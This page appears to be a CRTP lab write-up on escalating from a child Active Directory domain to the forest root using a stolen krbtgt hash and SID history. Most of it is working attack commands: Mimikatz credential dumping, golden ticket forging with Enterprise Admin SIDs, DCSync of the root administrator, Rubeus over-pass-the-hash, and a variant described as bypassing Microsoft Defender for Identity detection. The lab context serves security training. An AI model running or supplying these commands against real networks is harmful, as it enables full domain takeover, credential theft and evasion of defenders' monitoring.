Using KRBTGT Hash

We abuse sIDhistory again. First, we dump the credentials and obtain krbtgt of dcorp-dc.

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

We can forge the inter-realm TGT for Administrator and inject it.

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"

In the above command, the mimkatz option "/sids" is forcefully setting the sIDHistory for the Enterprise Admin group for dollarcorp.moneycorp.local that is the Forest Enterprise Admin Group.

We can now access mcorp:

winrs -r:mcorp-dc.moneycorp.local cmd

  • On any machine of the current domain

Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'

  • We can now run commands on the remote machine

ls \\mcorp-dc.moneycorp.local.kirbi\c$
gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local

  • If you can't access shell on the remote system with winrs, in case you get an error as shown in the screen shot below, here is what to do to get a shell 🤟 (DCsync)

  1. Run the dcsync attack against the krbtgt hash of the forest root

C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\administrator /domain:moneycorp.local" "exit"

  1. Now use over-passthehash to start a process as the administrator of moneycorp.local of this domain we want the request to be sent to

C:\Windows\system32>C:\AD\Tools\Rubeus.exe asktgt /user:moneycorp.local\administrator /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local /aes256:a85958da138b6b0cea2ec07d3cb57b76fdbd6886938c0250bb5873e2b32371a0 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show/ptt

  • You should now have a new process running as domain administrator of mcorp-dc, run the winrs command again and you should have shell access

winrs -r:mcorp-dc cmd

  • Avoid suspicious logs by using Domain Controllers group (Bypass MDI Detection) Note: /user:dcorp-dc$ used to work earlier (till April 2023) but now we need to user /user:Administrator

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden -dc$ /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /groups:516 /sids:S-1-5-21-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"

Domain SID's -:

  • S-1-5-21-2578538781-2508153159-3419410681-516 - Domain Controllers

  • S-1-5-9 - Enterprise Domain Controllers

PreviousCRTP Lab 18NextCRTP Lab 19

Last updated